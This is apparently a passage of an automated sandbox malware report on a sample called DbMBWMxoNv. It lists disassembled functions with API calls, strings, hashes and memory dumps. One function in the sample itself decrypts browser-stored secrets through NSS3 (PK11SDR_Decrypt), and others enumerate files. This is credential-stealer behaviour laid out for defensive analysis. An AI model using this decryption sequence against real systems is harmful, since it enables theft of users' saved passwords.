Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 7de8e72b0f3c38d7b0f0966fbf7e29f6ae0a4b19e099f43b02872f303bdf46e4
Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
Opcode Fuzzy Hash: 7de8e72b0f3c38d7b0f0966fbf7e29f6ae0a4b19e099f43b02872f303bdf46e4
Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95

Function 6CF31C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CF31C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CF31C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CF31CA1
GetLengthSid.ADVAPI32(?), ref: 6CF31CA9
malloc.MOZGLUE(00000000), ref: 6CF31CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CF31CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CF31CE4
GetLengthSid.ADVAPI32(?), ref: 6CF31CEC
malloc.MOZGLUE(00000000), ref: 6CF31CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CF31D0F
CloseHandle.KERNEL32(?), ref: 6CF31D17
AllocateAndInitializeSid.ADVAPI32 ref: 6CF31D4D
GetLastError.KERNEL32 ref: 6CF31D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CF31D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CF31D7A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 5d456c465006ddfd945cdcaf68d22a0f729aca9d66c09cae672f8b72c5b26e55
Instruction ID: 87cc401ddf29435df23e4dc4882881056fd5bb61e86f2bc578ce5d7d51a830d0
Opcode Fuzzy Hash: 5d456c465006ddfd945cdcaf68d22a0f729aca9d66c09cae672f8b72c5b26e55
Instruction Fuzzy Hash: CB314FB5900218AFEF11DF64CC48BEA7BB8FF4A309F049169FA09D6151E7305A94CF69

Function 6CF33D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CF33DFB
__allrem.LIBCMT ref: 6CF33EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF33FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CF34047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF340DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF3415F
__allrem.LIBCMT ref: 6CF3416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF34288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF342AB
__allrem.LIBCMT ref: 6CF342B7

Strings

%02d, xrefs: 6CF34086
%03d, xrefs: 6CF342E8
%lld, xrefs: 6CF33FB2
%04d, xrefs: 6CF3407B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: b87db632af650917f0bacb1f180eb2b91e89d0a75807e375975493b730581d3d
Instruction ID: 8b267bd7445346869d315162fc89f447a6bf62391768ad819ebef9efa1ca75f4
Opcode Fuzzy Hash: b87db632af650917f0bacb1f180eb2b91e89d0a75807e375975493b730581d3d
Instruction Fuzzy Hash: 2DF11571A08750AFE715CF38C841B6BBBF6AFC5304F148A2DF88997651E735D4468B82

Function 6CEE1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CEE1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CEE1FB7

Strings

another row available, xrefs: 6CEE2287
attached databases must use the same text encoding as main database, xrefs: 6CEE20CA
no more rows available, xrefs: 6CEE2264
abort due to ROLLBACK, xrefs: 6CEE2223
unknown error, xrefs: 6CEE2291
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CEE1F83
table, xrefs: 6CEE1C8B
unsupported file format, xrefs: 6CEE2188
sqlite_temp_master, xrefs: 6CEE1C5C
sqlite_master, xrefs: 6CEE1C61

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: b9f3ebd4d774c3dc77619a7719ea79af78e884b765f666e1fc9a500d5ae14780
Instruction ID: 4edd9d8f258a3980c1bd4028c737fe7d74adad9ad3536b62d5c12f0425a07d6f
Opcode Fuzzy Hash: b9f3ebd4d774c3dc77619a7719ea79af78e884b765f666e1fc9a500d5ae14780
Instruction Fuzzy Hash: 3412C0716083429FD715CF19C084B1AB7F2BF9A358F28856DE8998B752D731EC46CB82

Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414113
FindFirstFileA.KERNEL32(?,?), ref: 0041412A
StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
FindClose.KERNEL32(000000FF), ref: 004142D1

Strings

%s\%s, xrefs: 00414107

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 5b8c1580809c69ac76095e9b4c88243a53e279da58b5f4a60bdd84fcb86e5260
Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
Opcode Fuzzy Hash: 5b8c1580809c69ac76095e9b4c88243a53e279da58b5f4a60bdd84fcb86e5260
Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59

Function 6CECECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CECEF98

Strings

%s at line %d of [%.10s], xrefs: 6CECF492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECF483
database corruption, xrefs: 6CECF48D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: f8f5257ebc32dd624cf02903833f2b86508a9563757d767751013319fd55db55
Instruction ID: 4098da2979b096438f9bac44486ec507d1f3baeb76352b83aa13361e529b5edd
Opcode Fuzzy Hash: f8f5257ebc32dd624cf02903833f2b86508a9563757d767751013319fd55db55
Instruction Fuzzy Hash: 0862F274B046458FEB04CF28C641B9EBBB1BF4531CF384158D9665BB92D739E882CB92

Function 6CF6FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CF6FD06

Part of subcall function 6CF6F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CF6F696
Part of subcall function 6CF6F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CF6F789
Part of subcall function 6CF6F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CF6F796
Part of subcall function 6CF6F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CF6F79F
Part of subcall function 6CF6F670: SECITEM_DupItem_Util.NSS3 ref: 6CF6F7F0

Part of subcall function 6CF93440: PK11_GetAllTokens.NSS3 ref: 6CF93481
Part of subcall function 6CF93440: PR_SetError.NSS3(00000000,00000000), ref: 6CF934A3
Part of subcall function 6CF93440: TlsGetValue.KERNEL32 ref: 6CF9352E
Part of subcall function 6CF93440: EnterCriticalSection.KERNEL32(?), ref: 6CF93542
Part of subcall function 6CF93440: PR_Unlock.NSS3(?), ref: 6CF9355B

SECITEM_DupItem_Util.NSS3(?), ref: 6CF6FDAD

Part of subcall function 6CF9FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CF49003,?), ref: 6CF9FD91
Part of subcall function 6CF9FD80: PORT_Alloc_Util.NSS3(A4686CFA,?), ref: 6CF9FDA2
Part of subcall function 6CF9FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CFA,?,?), ref: 6CF9FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CF6FE00

Part of subcall function 6CF9FD80: free.MOZGLUE(00000000,?,?), ref: 6CF9FDD1

Part of subcall function 6CF8E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF8E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF6FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6CF6FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CF6FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CF6FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CF6FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CF6FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CF6FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CF70007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CF70029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CF70044

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 7845c683b31fda4594013814893978040b17d8910f703a70776690e3d75d37da
Instruction ID: 50c6e1b377452b143d2b4c98e49ae2534262d5aa200d4d4e7e4e171fd3cbcff8
Opcode Fuzzy Hash: 7845c683b31fda4594013814893978040b17d8910f703a70776690e3d75d37da
Instruction Fuzzy Hash: 3DB1B371504201AFE704CF29C841B6BBBE5FF88318F558A2DF999CBA41E771E944CB91

Function 6CF67D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6CF67DDC

Part of subcall function 6CFA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF48298,?,?,?,6CF3FCE5,?), ref: 6CFA07BF
Part of subcall function 6CFA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFA07E6
Part of subcall function 6CFA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA081B
Part of subcall function 6CFA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFA0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CF67DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CF67F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6CF67F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CF67F98
PK11_FreeSymKey.NSS3(?), ref: 6CF67FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CF67FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CF68000

Part of subcall function 6CF89430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CF67F0C,?,00000000,00000000,00000000,?), ref: 6CF8943B
Part of subcall function 6CF89430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CF8946B
Part of subcall function 6CF89430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CF89546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CF68110
PK11_FreeSymKey.NSS3(00000000), ref: 6CF6811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CF6822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CF6823C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 239a7999889fa2fa1a41565f15ec12d7a785b5ae17f1eeadfb46908aa1d163f8
Instruction ID: b2d7d330a74bafe915da78c507d4a36c88b7ba3547a4fef1257874bb4574f721
Opcode Fuzzy Hash: 239a7999889fa2fa1a41565f15ec12d7a785b5ae17f1eeadfb46908aa1d163f8
Instruction Fuzzy Hash: DBC160B1D402599BEB21CF15CC40FEAB7B8AF15308F0485EAE91DA7A41E7719E85CF90

Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EE3E
FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
FindClose.KERNEL32(000000FF), ref: 0040F3C3

Strings

%s\*.*, xrefs: 0040EE32

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 486cfb64c0557d5bd127cdb099738e66e75f54bf0c3ba3f1e61f62ee9bd2ef6f
Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
Opcode Fuzzy Hash: 486cfb64c0557d5bd127cdb099738e66e75f54bf0c3ba3f1e61f62ee9bd2ef6f
Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59

Function 6CF70EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CF70F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CF70FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CF71006
PK11_FreeSymKey.NSS3(?), ref: 6CF7101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF71033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CF7103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CF71048
memcpy.VCRUNTIME140(?,?,?), ref: 6CF7108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CF710BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CF710D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CF7112E

Part of subcall function 6CF71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CF708C4,?,?), ref: 6CF715B8
Part of subcall function 6CF71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CF708C4,?,?), ref: 6CF715C1
Part of subcall function 6CF71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF7162E
Part of subcall function 6CF71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF71637

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 60b2499c29615e053e7f98a7eddb68d7ddf86eef85b56be630ecdc3b8fbcde65
Instruction ID: 3f0ba321fd22d18612c3544f6a9ac48a319f9130f0bfe0a04060677e0ce0c163
Opcode Fuzzy Hash: 60b2499c29615e053e7f98a7eddb68d7ddf86eef85b56be630ecdc3b8fbcde65
Instruction Fuzzy Hash: BE71E2B1A002058FDB14CFA5EC94A6BB7B4FF48318F14862EE91D9B711E771D958CBA0

Function 0040C920 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C953
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D1DFB8), ref: 0040C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
memcpy.MSVCRT(?,?,?), ref: 0040CA12
lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
PK11_FreeSlot.NSS3(?), ref: 0040CA61
lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95

Function 6CF91CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule
